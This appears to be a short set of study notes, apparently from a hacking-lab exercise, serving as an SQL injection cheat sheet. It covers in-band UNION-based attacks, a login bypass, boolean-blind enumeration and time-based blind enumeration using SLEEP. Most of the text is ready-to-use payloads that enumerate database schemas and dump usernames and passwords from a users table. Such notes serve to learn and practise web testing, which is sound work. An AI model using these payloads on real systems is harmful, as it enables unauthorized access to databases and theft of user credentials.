Skip to content

Sql Injection

In-Band SQLi

  • Check if there is a sqli vuln
    • ' or "
  • check how many columns are returned
    • 1 UNION SELECT 1
    • 0 UNION SELECT 1,2,3
  • get the database name
    • 0 UNION SELECT 1,2,database()
  • get the tables in the database
    • 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
  • get the column informations in the target table
    • 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
  • get the content of the table
  • 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

Blind SQLi

  • Bypass login
    • ' OR 1=1;--

Boolean Blind SQLi

Find a boolean-like api that takes parameters. Ensure the endpoint answers with false (no record from db returned). Now change the parameters so that your question results in a positive record from the database.

admin123' union select 1,2,3 where database() like 'sqli_three%';-- ... over ... admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';-- ... till ... admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';

Every little step must be sent to seperately which is very tidious, but still effective.

This way a user can be enumerated and his password can be found (wordlists).

Timebased Blind SQLi

In case you don't even have a value-based indicator, you can utilize the time delay of a query. This is done by actually doing quite the same as for the Boolean Blind SQLi but you use sleep(1) to delay the result. The sleep(1) is only executed if the result of the query has an record because sleep(1) is like a function that is executed on the column values.

admin123' UNION SELECT SLEEP(1),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'users%';--